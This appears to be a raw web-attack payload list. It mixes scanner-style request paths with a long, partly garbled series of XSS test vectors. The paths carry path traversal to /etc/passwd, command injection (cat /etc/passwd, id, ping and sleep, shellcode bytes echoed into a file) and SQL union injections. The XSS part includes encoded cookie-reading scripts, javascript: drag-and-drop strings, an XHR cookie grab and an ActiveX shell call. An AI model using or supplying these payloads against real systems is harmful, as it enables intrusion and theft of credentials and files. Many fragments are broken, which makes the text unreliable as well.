/opensiteadmin/scripts/classes/fieldmanager.php?path=http://192.168.202.96:8080/frznctvhi0i5?\x00 /0z575z74.aspx? /pda's / handheld pc's / /b1q8bywu.asp? /examples/servlets/servlet/sojourn.cgi?cat=../../../../../etc/passwd\x00 /webcgi/fileseek2.cgi?foot=&head=;cat /etc/passwd| /examples/jsp/checkbox/data/fetch.php?page=' /scripts/bsml.pl?action=sm /ovcgi/getnnmdata.exe /clonazepam-description/ /examples/jsp/colors/mylog.html?screen=/etc/passwd /main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.28.202/&frm_user=&scr_height=q24745466&scr_width= /ny1b3qq4.cgi? /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+d0+8b+04+91+01+f0+89+45+f0+eb+06+43+3b+5d+f4+72+d4+89+ec+61+8b+44+24+d0+c2++>>ctdn /examples/jsp/cal/file.php?path=/etc/passwd\x00 /en-us/9kr0ih0v.do? /e9rx3ya4.mscgi? /cgi-bin/mail.php?id='/**/union/**/select/**/1,2,1331919224,4--&blog=1 /examples/jsp/checkbox/commerce.cgi?page=../../../../../etc/passwd\x00index.html /cgi-914/query?mss=../config /j2kdmfw4.x? /help.php?q="&ping\x0b-w\x0b8000\x0b-n\x0b1\x0b4.3.2.1&rem\x0b /help.php?q='sleep 9 # /javascript/batch.exe /scripts/notify?from=nessus"|id" /main.php?stuff="&ping\x0b-w\x0b9000\x0b-n\x0b1\x0b4.3.2.1&rem\x0b /viewcvs.cgi/?cvsroot= /examples/jsp/colors/plugins/safehtml/htmlsax3.php?dir[plugins]=/etc/passwd\x00 /javascript/cpp.exe /main.php?logout="&ping\x09-w\x099000\x09-n\x091\x094.3.2.1&rem\x09 /examples/jsp/sessions/cgiwrap/cgiwrap_error_page_handling_xss.nasl /phpmyadmin/mail.php?id='/**/union/**/select/**/1,2,1331904464,4--&blog=1 /main.php?stuff="\x0duname\x09# /dda2qr7j.idc? /fo564rei.do? /manager/session/login.php?dest=nessus"> <%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); <--` --!> <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> <alert("XSS");//< Click Me ClickMe X?

style="x:"> ? ?
XXXXXX//["'`-->]]>]
1//["'`-->]]>]
1//["'`-->]]>]
XXX//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]
><image xlink:href="//["'`-->]]>]
//["'`-->]]>]
  • //["'`-->]]>]
    XXX//["'`-->]]>]
    Hello //["'`-->]]>]
    X//["'`-->]]>]
    XXX
    //["'`-->]]>]
    XXX
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    alert(57)//0//["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    XXX
    //["'`-->]]>]
    XXX
    //["'`-->]]>]
    //["'`-->]]>]
    // O10.10↓, OM10.0↓, GC6↓, FF // IE6, O10.10↓, OM10.0↓ // IE6, O11.01↓, OM10.1↓//["'`-->]]>]
    ]>&x;//["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    ]>//["'`-->]]>]
    XXX //["'`-->]]>]
    //["'`-->]]>]
    x
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    &x;//["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    PRESS ENTER
    //["'`-->]]>]
    [A] "> "> "> [B] "> [C] [D] <% foo>//["'`-->]]>]
    X
    //["'`-->]]>]
    X
    //["'`-->]]>]
    alert(94) //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    X
    //["'`-->]]>]
    XXX//["'`-->]]>]
    //["'`-->]]>]
    XXX//["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    `><img src=xx:x onerror=alert(108)></a> `><img src=xx:x onerror=alert(2)// `><img src=xx:x onerror=alert(3)////["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    X
    //["'`-->]]>]
    X
    //["'`-->]]>]
    XXX
    //["'`-->]]>]
    XXX//["'`-->]]>]
    //["'`-->]]>]
    x
    //["'`-->]]>]
    //["'`-->]]>]

    Drop me

    //["'`-->]]>]
    //["'`-->]]>]
    Spam//["'`-->]]>]
    //["'`-->]]>]
    Some text www.example.org //["'`-->]]>]
    // Safari 5.0, Chrome 9, 10 // Safari 5.0//["'`-->]]>]
    ]> //["'`-->]]>]
    //["'`-->]]>]
    alert(127) //["'`-->]]>]
    //["'`-->]]>]
    CLICKME CLICKME CLICKMEhttp://http://google.com //["'`-->]]>]
    drag and drop one of the following strings to the drop box:

    jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//

    feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//

    feed:data:text/html,<script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)</script><b>

    feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//

    + Drop Box +
    //["'`-->]]>]

    //["'`-->]]>]
    //["'`-->]]>]
    <% %></xmp><img src=xx:x onerror=alert(134)// %>/ alert(2) XXX -->{} *{color:red}//["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E <window.onload=function(){document.forms[0].message.value='1';} x” <%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); # # MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);# # %23 # #var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); #var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); ? ">
    ? "> " charset=utf- '`"><*chr*script>log(*num*) Save // <*datahtmlelements* data=about:blank background=about:blank action=about:blank type=image/gif src=about:blank href=about:blank *dataevents*="customLog('*datahtmlelements* *dataevents*')"> <*datahtmlelements* *dataevents*="javascript:parent.customLog('*datahtmlelements* *dataevents*')"> <*datahtmlelements* *datahtmlattributes*="javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')">
    x?f
    right-click
    DIV
    DIV
    x <%div%20style=xss:expression(prompt(1))>
    style="x:">
    style="x:">
    Mouse Over
    X
    exp/*'/ for(i=10;i>1;i--)confirm(i);new ActiveXObject("WScript.shell").Run('calc.exe',1,true);